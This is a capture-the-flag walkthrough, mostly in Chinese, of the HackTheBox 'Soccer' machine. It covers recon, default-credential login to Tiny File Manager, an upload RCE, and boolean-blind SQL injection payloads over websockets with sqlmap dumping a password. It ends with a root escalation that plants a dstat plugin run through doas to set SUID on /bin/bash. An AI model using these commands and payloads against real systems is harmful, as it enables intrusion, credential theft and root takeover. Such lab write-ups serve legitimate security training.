Soccer
Recon
Ports
sudo nmap -sT -sC -sV -p22,80,9091 10.129.109.253
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-16 11:20 CST
Nmap scan report for 10.129.109.253
Host is up (0.13s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 ad:0d:84:a3:fd:cc:98:a4:78:fe:f9:49:15:da:e1:6d (RSA)
| 256 df:d6:a3:9f:68:26:9d:fc:7c:6a:0c:29:e9:61:f0:0c (ECDSA)
|_ 256 57:97:56:5d:ef:79:3c:2f:cb:db:35:ff:f1:7c:61:5c (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://soccer.htb/
9091/tcp open xmltec-xmlmail?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, Help, RPCCheck, SSLSessionReq, drda, informix:
| HTTP/1.1 400 Bad Request
| Connection: close
| GetRequest: | HTTP/1.1 404 Not Found
| Content-Security-Policy: default-src 'none'
| X-Content-Type-Options: nosniff
| Content-Type: text/html; charset=utf-8
| Content-Length: 139
| Date: Mon, 16 Jun 2025 03:20:31 GMT
| Connection: close
| <!DOCTYPE html>
| <html lang="en">
| <head>
| <meta charset="utf-8">
| <title>Error</title>
| </head>
| <body>
| <pre>Cannot GET /</pre>
| </body>
| </html>
| HTTPOptions:
| HTTP/1.1 404 Not Found
| Content-Security-Policy: default-src 'none'
| X-Content-Type-Options: nosniff
| Content-Type: text/html; charset=utf-8
| Content-Length: 143
| Date: Mon, 16 Jun 2025 03:20:31 GMT
| Connection: close
| <!DOCTYPE html>
.....
Enum
Direnum
端口80与9091目录扫描结果如下:
feroxbuster -u http://soccer.htb/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-medium-directories.txt
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.11.0
───────────────────────────┬──────────────────────
🎯 Target Url │ http://soccer.htb/
🚀 Threads │ 50
📖 Wordlist │ /usr/share/wordlists/seclists/Discovery/Web-Content/raft-medium-directories.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.11.0
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404 GET 7l 12w 162c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403 GET 7l 10w 162c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200 GET 494l 1440w 96128c http://soccer.htb/ground3.jpg
200 GET 2232l 4070w 223875c http://soccer.htb/ground4.jpg
200 GET 711l 4253w 403502c http://soccer.htb/ground2.jpg
200 GET 809l 5093w 490253c http://soccer.htb/ground1.jpg
200 GET 147l 526w 6917c http://soccer.htb/
301 GET 7l 12w 178c http://soccer.htb/tiny => http://soccer.htb/tiny/
301 GET 7l 12w 178c http://soccer.htb/tiny/uploads => http://soccer.htb/tiny/uploads/
[####################] - 2m 90021/90021 0s found:7 errors:0
[####################] - 73s 30000/30000 413/s http://soccer.htb/
[####################] - 72s 30000/30000 415/s http://soccer.htb/tiny/
[####################] - 72s 30000/30000 416/s http://soccer.htb/tiny/uploads/
feroxbuster -u http://soccer.htb:9091/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-medium-directories.txt
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.11.0
───────────────────────────┬──────────────────────
🎯 Target Url │ http://soccer.htb:9091/
🚀 Threads │ 50
📖 Wordlist │ /usr/share/wordlists/seclists/Discovery/Web-Content/raft-medium-directories.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.11.0
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404 GET 10l 15w -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
[####################] - 76s 30000/30000 0s found:0 errors:0
[####################] - 75s 30000/30000 398/s http://soccer.htb:9091/
存在子目录tiny。
vhost enum
ffuf -u http://soccer.htb/ -H "Host: FUZZ.soccer.htb" -w /usr/share/wordlists/seclists/Discovery/DNS/n0kovo_subdomains.txt -ac
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://soccer.htb/
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/DNS/n0kovo_subdomains.txt
:: Header : Host: FUZZ.soccer.htb
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
ffuf -u http://soccer.htb:9091/ -H "Host: FUZZ.soccer.htb" -w /usr/share/wordlists/seclists/Discovery/DNS/n0kovo_subdomains.txt -ac
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://soccer.htb:9091/
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/DNS/n0kovo_subdomains.txt
:: Header : Host: FUZZ.soccer.htb
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
均未发现存在子域名。 端口80访问:
Soccer
Home
HTB FootBall Club
"We Love Soccer"
Due to the scope and popularity of the sport, professional football clubs carry a significant commercial existence, with fans expecting personal service and interactivity, and stakeholders viewing the field of professional football as a source of significant business
advantages. For this reason, expensive player transfers have become an expectable part of the sport. Awards are also handed out to managers or coaches on a yearly basis for excellent performances. The designs, logos and names of professional football clubs are often
licensed trademarks. The difference between a football team and a (professional) football club is incorporation, a football club is an entity which is formed and governed by a committee and has members which may consist of supporters in addition to players.
Latest News
admin
Get updates on the latest World Cup action and find articles, videos, commentary and analysis in one place.
admin
The FIFA World Cup Qatar 2022 will be played from 20 November to 18 December.
admin
Soccer is the most popular game in the world. In many countries it is known as “football”.
admin
FIFA World Cup is the most popular soccer tournament that is followed by billions of people around the world on their Television so I wanted to take some time and make this web page dedicated to World Cup Soccer Facts only.
端口9091访问:此端口服务无特殊目录与接口,留待后用。
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Error</title>
</head>
<body>
<pre>Cannot GET /</pre>
</body>
</html>
Expoloit
访问http://soccer.htb/tiny ,需要登录,使用默认凭据成功(admin:admin@123)进入。由于htb缓存加载问题,网页打开十分缓慢。使用w3m打开,访问得如下:
Create New Item
×
Item Type
( ) File
(*) Folder
Item Name
[ ]
Cancel Create Now
[ ]
×
Search file in folder and subfolders...
File Manager
• [ ]
Advanced Search
• Upload
• New Item
• admin
Settings Help Sign Out
[ ] Name Size Modified Perms Owner Actions
[ ] tiny Folder 17.11.22 08:07 0755 root:root
[ ] football.jpg 376.23 KB 17.11.22 08:07 0644 root:root
[ ] ground1.jpg 264.68 KB 17.11.22 08:07 0644 root:root
[ ] ground2.jpg 218.5 KB 17.11.22 08:07 0644 root:root
[ ] ground3.jpg 55.05 KB 17.11.22 08:07 0644 root:root
[ ] ground4.jpg 121.57 KB 17.11.22 08:07 0644 root:root
[ ] index.html 6.75 KB 17.11.22 08:07 0644 root:root
Full Size: 1.02 MB File: 6 Folder: 1 Memory used: 2 MB Partition size: 1.09 GB free of 3.84 GB
• Select all
• Unselect all
• Invert Selection
• [Delete] Delete
• [zip] Zip
• [tar] Tar
• [Copy] Copy
**Tiny File Manager 2.4.3**
在var/www/html/tiny/tinyfilemanager.php路径下存在凭据信息:
$auth_users = array(
'admin' => '$2y$10$/K.hjNr84lLNDt8fTXjoI.DBp6PpeyoJ.mGwrrLuCZfAwfSAGqhOW', //admin@123
'user' => '$2y$10$Fg6Dz8oH9fPoZ2jJan5tZuv6Z4Kp7avtQ9bDfrdRntXtPeiMAZyGO' //12345
);
Tiny File Manager版本为2.4.3.搜索历史漏洞发现存在Upload RCE漏洞,在uploads文件夹下(其他文件夹权限不够)可上传shell文件,访问得到反弹shell。
Shell as www-data
在常规目录和用户家目录下未发现存在敏感信息和文件,也无可用提权路径。 端口信息如下所示,开放有3000、3306、33060。
www-data@soccer:/etc/nginx/sites-available$ ss -antlp
ss -antlp
State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
LISTEN 0 511 0.0.0.0:9091 0.0.0.0:*
LISTEN 0 70 127.0.0.1:33060 0.0.0.0:*
LISTEN 0 151 127.0.0.1:3306 0.0.0.0:*
LISTEN 0 511 0.0.0.0:80 0.0.0.0:* users:(("nginx",pid=1029,fd=6),("nginx",pid=1028,fd=6))
LISTEN 0 4096 127.0.0.53%lo:53 0.0.0.0:*
LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
LISTEN 0 511 127.0.0.1:3000 0.0.0.0:*
LISTEN 0 511 [::]:80 [::]:* users:(("nginx",pid=1029,fd=7),("nginx",pid=1028,fd=7))
LISTEN 0 128 [::]:22 [::]:*
3306和33060为mysql端口,使用已知信息和弱口令进行尝试无法访问。
www-data@soccer:/$ mysql -p 3306
Enter password: ERROR 1045 (28000): Access denied for user 'www-data'@'localhost' (using password: YES)
www-data@soccer:/$ mysql -p 33060 Enter password: ERROR 1045 (28000): Access denied for user 'www-data'@'localhost' (using password: YES)
但在nginx配置文件下发现存在有子域名soc-player。
www-data@soccer:/etc/nginx/sites-available$ cat soc
cat soc-player.htb
server {
listen 80;
listen [::]:80;
server_name soc-player.soccer.htb;
root /root/app/views;
location / {
proxy_pass http://localhost:3000;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection 'upgrade';
proxy_set_header Host $host;
proxy_cache_bypass $http_upgrade;
}
}
访问soc-player.soccer.htb,相较于原网页多了几个子目录:Match、Login、Signup。
Soccer
Home
M┌─────────┐
L│a: Home │
S│b: Match │
│c: Login │
H│d: Signup│ Club
└─────────┘
"We Love Soccer"
Due to the scope and popularity of the sport, professional football clubs carry a significant commercial existence, with fans expecting personal service and interactivity, and stakeholders viewing the field of professional football as a source of significant business
advantages. For this reason, expensive player transfers have become an expectable part of the sport. Awards are also handed out to managers or coaches on a yearly basis for excellent performances. The designs, logos and names of professional football clubs are often
licensed trademarks. The difference between a football team and a (professional) football club is incorporation, a football club is an entity which is formed and governed by a committee and has members which may consist of supporters in addition to players.
Latest News
admin
Get updates on the latest World Cup action and find articles, videos, commentary and analysis in one place.
admin
The FIFA World Cup Qatar 2022 will be played from 20 November to 18 December.
admin
Soccer is the most popular game in the world. In many countries it is known as “football”.
admin
FIFA World Cup is the most popular soccer tournament that is followed by billions of people around the world on their Television so I wanted to take some time and make this web page dedicated to World Cup Soccer Facts only.
创建账号后登录。
Soccer
Home
Match
Tickets
Logout
Your Ticket Id: 88561
[ ]
10 days remaining for the match.
Price
Free
** Please don't forget your ticket number. **
在check子目录下的输入框中可以进行通过Ticket Id查询,返回字段:Ticket Exists。进行接口测试,根据字段Ticket Exists和Ticket Doesn't Exist,发现存在布尔型盲注SQL注入漏洞。 测试payload如下:
{"id":"0 and 1=1"}
Ticket Exists
{"id":"0 and 1=2"}
Ticket Doesn't Exist
使用burpsuite抓包发现,此为websockets协议。sqlmap在下载python3-websockets包(kali)后可以支持ws协议sql注入测试。详情如下:
sqlmap -u ws://soc-player.soccer.htb:9091 --data '{"id":"0 or 1=2"}' --dbms mysql --batch --level 5 --risk 3
___
__H__
___ ___[)]_____ ___ ___ {1.9.4#stable}
|_ -| . ['] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caus
ed by this program
[*] starting @ 15:04:06 /2025-06-16/
...[snap]...
[15:04:11] [WARNING] heuristic (basic) test shows that (custom) POST parameter 'JSON id' might not be injectable
[15:04:12] [INFO] testing for SQL injection on (custom) POST parameter 'JSON id'
[15:04:12] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[15:04:37] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[15:04:46] [INFO] (custom) POST parameter 'JSON id' appears to be 'OR boolean-based blind - WHERE or HAVING clause' injectable
[15:07:10] [INFO] checking if the injection point on (custom) POST parameter 'JSON id' is a false positive
(custom) POST parameter 'JSON id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
...[snap]...
sqlmap identified the following injection point(s) with a total of 374 HTTP(s) requests:
---
Parameter: JSON id ((custom) POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: {"id":"-2861 OR 1945=1945"}
Title: MySQL >= 5.0.12 OR time-based blind (query SLEEP)
Payload: {"id":"0 or 1=2 OR (SELECT 7447 FROM (SELECT(SLEEP(5)))lwUv)"}
---
[15:07:22] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
dump出用户名和密码。
sqlmap -u ws://soc-player.soccer.htb:9091 --data '{"id":"0 or 1=2"}' --dbms mysql --batch --level 5 --risk 3 --dbs
[15:11:30] [INFO] retrieved: soccer_db
available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] soccer_db
[*] sys
sqlmap -u ws://soc-player.soccer.htb:9091 --data '{"id":"0 or 1=2"}' --dbms mysql --batch --level 5 --risk 3 -D soccer_db -T accounts
Database: soccer_db
Table: accounts
[1 entry]
+------+-------------------+----------------------+----------+
| id | email | password | username |
+------+-------------------+----------------------+----------+
| 1324 | player@player.htb | PlayerOftheMatch2022 | player |
+------+-------------------+----------------------+----------+
Shell as user:player
进行提权信息搜集,发现存在doas。 doas是一款简洁的权限提升工具,类似于 sudo,但设计更轻量、安全,在配置文件doas.conf中可对具体权限进行划分。
-bash-5.0$ find / -perm -04000 2>/dev/null
/usr/local/bin/doas
/usr/lib/snapd/snap-confine
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/bin/umount
/usr/bin/fusermount
/usr/bin/mount
/usr/bin/su
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/bash
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/at
/snap/snapd/17883/usr/lib/snapd/snap-confine
/snap/core20/1695/usr/bin/chfn
/snap/core20/1695/usr/bin/chsh
/snap/core20/1695/usr/bin/gpasswd
/snap/core20/1695/usr/bin/mount
/snap/core20/1695/usr/bin/newgrp
/snap/core20/1695/usr/bin/passwd
/snap/core20/1695/usr/bin/su
/snap/core20/1695/usr/bin/sudo
/snap/core20/1695/usr/bin/umount
/snap/core20/1695/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core20/1695/usr/lib/openssh/ssh-keysign
-bash-5.0$
doas.conf信息如下:
-bash-5.0$ find -name doas.conf -type f 2>/dev/null
-bash-5.0$ find / -name doas.conf -type f 2>/dev/null
/usr/local/etc/doas.conf
-bash-5.0$ cat /usr/local/etc/doas.conf
permit nopass player as root cmd /usr/bin/dstat
-bash-5.0$
用户player可以nopass执行/usr/bin/dstat。根据GTFObins,在目录/usr/local/share/dstat/下创建脚本文件( /usr/share/dstat/无法写入,权限不够。~/.dstat/也不行,因为我们以root权限执行脚本,~指向的是root用户的家目录。)
```bash
player@soccer:/usr/local/share/dstat$ echo -e "import os;\nos.system('chmod u+s /bin/bash')" > /usr/local/share/dstat/dstat_exp.py
player@soccer:/usr/local/share/dstat$ which dstat
/usr/bin/dstat
player@soccer:/usr/local/share/dstat$ doas -u root /usr/bin/dstat --exp
/usr/bin/dstat:2619: DeprecationWarning: the imp module is deprecated in favour of importlib; see the module's documentation for alternative uses
import imp
Module dstat_exp failed to load. (name 'dstat_plugin' is not defined)
None of the stats you selected are available.
player@soccer:/usr/local/share/dstat$ ls -al /bin/bash
-rwsr-xr-x 1 root root 1183448 Apr 18 2022 /bin/bash
player@soccer:/usr/local/share/dstat$ /bin/bash -p
bash-5.0# exit
exit
Summary
靶机整体路径: 目录扫描 --> tiny filesystem --> upload rce --> 机器内部信息搜集 --> 通过配置文件得到隐藏子域 --> 接口SQL注入 --> dump数据库得到用户凭据 --> ssh登录 --> find suid --> dstat提权。 这是一个普通难度的靶机,但是实际上还是要更难一些的,体现在得到webshell后还需要寻找隐藏的子域。(nginx配置文件,很容易搞忘这一点。)这里绕了一下,得到子域后针对接口点进行测试,存在一个sql注入,很容易探测到。然后就是通过sqlmap进行爆破。得到user shell后,通过找到的具有suid位的doas。通过它的配置文件可以提权路径dstat。很有趣。